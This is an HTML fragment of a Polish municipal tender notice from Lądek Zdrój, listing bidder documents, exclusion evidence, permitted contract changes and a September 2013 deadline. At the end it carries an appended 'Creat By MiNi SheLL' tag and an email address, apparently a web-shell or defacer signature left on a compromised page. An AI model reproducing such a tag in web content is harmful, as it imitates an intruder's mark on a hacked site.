<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz oferty - na druku wg ZAŁĄCZNIKA  1 do SIWZ.

2. Wypełniony i podpisany formularz kosztorysu ofertowego - na druku wg ZAŁĄCZNIKA 2 do SIWZ.

3. Dowód wpłaty wadium (w przypadku formy pieniężnej - potwierdzenie przelewu środków finansowych na konto Zamawiającego, w przypadku pozostałych form wniesienia - wadium oryginał dokumentu należy złożyć w Wydziale Finansowo-Budżetowym Zamawiającego, zaś do oferty dołączyć kopię dokumentu). Jeśli Wykonawca prześle ofertę pocztą winien kopię dowodu wniesienia wadium załączyć do oferty. Oryginał dowodu wniesienia wadium należy umieścić w oznaczone kopercie oryginał dowodu wniesienia wadium i załączyć do oferty.

4. Zaakceptowany wzór umowy - ZAŁĄCZNIK NR 6 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano	wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.
1.1. Zmiana terminu realizacji przedmiotu umowy:
a). zmiany spowodowane warunkami atmosferycznymi, geologicznymi, archeologicznymi, w szczególności:
a.1). klęski żywiołowe;
a.2). warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej 0 st. C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze  z wyładowaniami atmosferycznymi;
a.3). niewypały i niewybuchy;
a.4). wykopaliska archeologiczne;
a.5). odmienne od przyjętych w dokumentacji warunki geologiczne (kategorie gruntu, kurzawka, głazy narzutowe itp.);
a.6). odmienne od  przyjętych w dokumentacji warunki terenowe, w szczególności istnienie podziemnych sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów budowlanych (bunkry, fundamenty, ściany szczelne itp.).
b). zmiany będące następstwem działania organów administracji, w szczególności:
b.1). odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń;
c). inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac, a w szczególności brak możliwości dojazdu oraz transportu materiałów na teren robót spowodowany awariami, remontami, przebudowami dróg dojazdowych oraz protestami mieszkańców z blokadą dróg.
1.2. Zmiana sposobu spełnienia świadczenia - zmiany technologiczne, w szczególności:
a). niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń - ale zmiany te nie mogą powodować wzrostu ceny oferty;
b). pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy - ale zmiany te nie mogą powodować wzrostu ceny oferty;
c). pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
d). konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych/technologicznych lub materiałowych niż wskazane w dokumentacji, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem robót - ale zmiany te nie mogą powodować wzrostu ceny oferty,
e). odmienne od przyjętych w dokumentacji warunki geologiczne (kategorie gruntu, kurzawka, głazy narzutowe itp.) skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych;
f). odmienne od przyjętych w dokumentacji warunki terenowe, w szczególności istnienie podziemnych sieci, instalacji, urządzeń, nie zinwentaryzowanych obiektów budowlanych (bunkry, fundamenty, ściany szczelne itp.) skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych lub materiałowych;
g). konieczność zrealizowania robót przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
1.3. Zmiany osobowe:
a). zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane;
b). zmiana Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy;
c). rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy, o ile posłużenie się Podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia lub zastosowania przy wykonaniu przedmiotu umowy bardziej zaawansowanych rozwiązań technologicznych w porównaniu do wskazanych w SIWZ. Zmiana ta nie może dotyczyć czynności, które zgodnie z SIWZ muszą być wykonane przez Wykonawcę osobiście.
d). zmiany osób do nadzorowania robót.
1.4. Pozostałe zmiany:
a). rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi  z umowy planowanymi świadczeniami;
b). inna niż wymienione siła wyższa (zdarzenie zewnętrzne, niemożliwe do przewidzenia i do zapobieżenia) uniemożliwiające wykonanie przedmiotu umowy zgodnie z SIWZ i dokumentacją.
2. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a). skorzystanie z klauzul waloryzacyjnych przewidzianych w umowie na warunkach w niej określonych;
b). zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego, zmiana dokumentów potwierdzających uregulowanie płatności wobec podwykonawców);
c). zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ug-ladekzdroj. dolnyslask.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy, 57-540 Lądek Zdrój, ul. Rynek 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2013 godzina 11:30, miejsce: Urząd Miasta i Gminy, 57-540 Lądek Zdrój, ul. Rynek 31 - Biuro Obsługi Klienta (pokój nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com